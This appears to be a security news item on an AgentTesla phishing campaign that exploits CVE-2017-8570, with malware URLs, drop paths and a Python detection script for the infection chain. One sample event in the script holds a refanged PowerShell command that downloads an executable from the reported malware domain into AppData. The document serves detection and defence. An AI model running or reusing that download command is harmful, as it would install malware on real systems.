Symantec cybersecurity experts: The malware deployment is preceded by reconnaissance with the AdFind tool. The victims are large organizations.
Cybercrime: the CVE-2017-8570 vulnerability exploited to spread AgentTesla. CSIRT-Italy cybersecurity experts: The information of interest is then exfiltrated via SMTP.
Cybercrime actors are exploiting Microsoft Office's CVE-2017-8570 RCE vulnerability in a massive campaign to spread AgentTesla, CSIRT-Italy cybersecurity experts reported. The emails, written in English, appear to have been sent by import-export companies, using spoofing techniques, to multiple recipients hidden behind the words "undisclosed-recipients:". When the flaw is exploited, the Office attachment runs a PowerShell command that downloads an executable, the malware, from one of the following URLs (depending on the file), both hosted on the same domain:
- 1) hXXP://ck-t-hr[.]com/mbi.exe;
- 2) hXXP://ck-t-hr[.]com/new.exe.
The file is executed after being saved as C:\Users\<Username>\AppData\Roaming\mbi.exe or C:\Users\<Username>\AppData\Roaming\new.exe. In addition, information deemed of interest is exfiltrated via SMTP through the same, presumably compromised, mailbox.
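The execution chain described above (Office process spawning PowerShell, download from the reported domain, executable dropped under AppData\Roaming and then launched) can be turned into a simple detection over process-creation telemetry. The following is an added example, not code from CSIRT-Italy or the original report; the event fields, the `Event` class and the sample events are constructed assumptions modelled on Sysmon-style process-creation logs, and only the domain comes from the report.

```python
"""Flag the Office -> PowerShell -> AppData\\Roaming drop chain in process-creation events."""
import re
from dataclasses import dataclass
from typing import List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
KNOWN_DOMAINS = {"ck-t-hr.com"}  # domain named in the CSIRT-Italy report (refanged)
# Executable written or launched from the user's roaming profile folder
ROAMING_EXE = re.compile(r"\\appdata\\roaming\\[^\\]+\.exe", re.IGNORECASE)
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)


@dataclass
class Event:
    """Minimal, constructed process-creation record (hypothetical schema)."""
    parent: str   # full path of the parent image
    image: str    # full path of the created process image
    cmdline: str  # command line of the created process


def score_event(ev: Event) -> List[str]:
    """Return the reasons an event matches the chain; an empty list means no match."""
    reasons: List[str] = []
    parent = ev.parent.lower().rsplit("\\", 1)[-1]
    image = ev.image.lower().rsplit("\\", 1)[-1]
    if parent in OFFICE_PARENTS and image == "powershell.exe":
        reasons.append("office-spawned-powershell")
        m = URL_RE.search(ev.cmdline)
        if m:
            reasons.append("download-url")
            if m.group(1).lower() in KNOWN_DOMAINS:
                reasons.append("known-ioc-domain")
        if ROAMING_EXE.search(ev.cmdline):
            reasons.append("roaming-drop-path")
    elif ROAMING_EXE.search(ev.image):
        reasons.append("exe-run-from-roaming")
    return reasons


def scan(events: List[Event]):
    """Return (index, reasons) for every event that matches at least one stage."""
    return [(i, score_event(e)) for i, e in enumerate(events) if score_event(e)]


# Constructed sample events, not real telemetry
SAMPLE_EVENTS = [
    Event(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"powershell -w hidden Invoke-WebRequest http://ck-t-hr.com/mbi.exe "
          r"-OutFile C:\Users\alice\AppData\Roaming\mbi.exe"),
    Event(r"C:\Windows\explorer.exe", r"C:\Users\alice\AppData\Roaming\mbi.exe", "mbi.exe"),
    Event(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]
```

Correlating the first two hits on the same host and user is what lifts this from a noisy single-event rule to a confident alert; the SMTP exfiltration stage is better caught at the mail gateway than in process logs.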